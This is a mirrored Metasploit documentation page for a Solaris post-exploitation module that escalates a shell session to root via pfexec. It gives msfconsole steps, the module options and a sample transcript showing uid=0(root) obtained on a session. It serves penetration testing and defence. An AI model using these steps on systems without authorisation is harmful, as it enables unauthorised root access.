CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/post/solaris/escalate/pfexec.md
Views: 1904

Description

This module attempts to upgrade a shell session to UID 0 using pfexec.

Vulnerable Application

Verification Steps

  1. Start msfconsole

  2. Get a session

  3. use post/solaris/escalate/pfexec

  4. set SESSION <SESSION>

  5. run

  6. Your session should now have root privileges

Options

PFEXEC_PATH

Path to pfexec (default: /usr/bin/pfexec)

SHELL_PATH

Path to shell (default: /bin/sh)

Scenarios

msf5 > use post/solaris/escalate/pfexec msf5 post(solaris/escalate/pfexec) > sessions -i 1 -c id [*] Running 'id' on shell session 1 (172.16.191.221) uid=100(user) gid=10(staff) msf5 post(solaris/escalate/pfexec) > set verbose true verbose => true msf5 post(solaris/escalate/pfexec) > set session 1 session => 1 msf5 post(solaris/escalate/pfexec) > run [*] Trying pfexec as `user' ... [*] uid=0(root) gid=0(root) [+] Success! Upgrading session ... [+] Success! root shell secured [*] Post module execution completed msf5 post(solaris/escalate/pfexec) > sessions -i 1 -c id [*] Running 'id' on shell session 1 (172.16.191.221) uid=0(root) gid=0(root) msf5 post(solaris/escalate/pfexec) >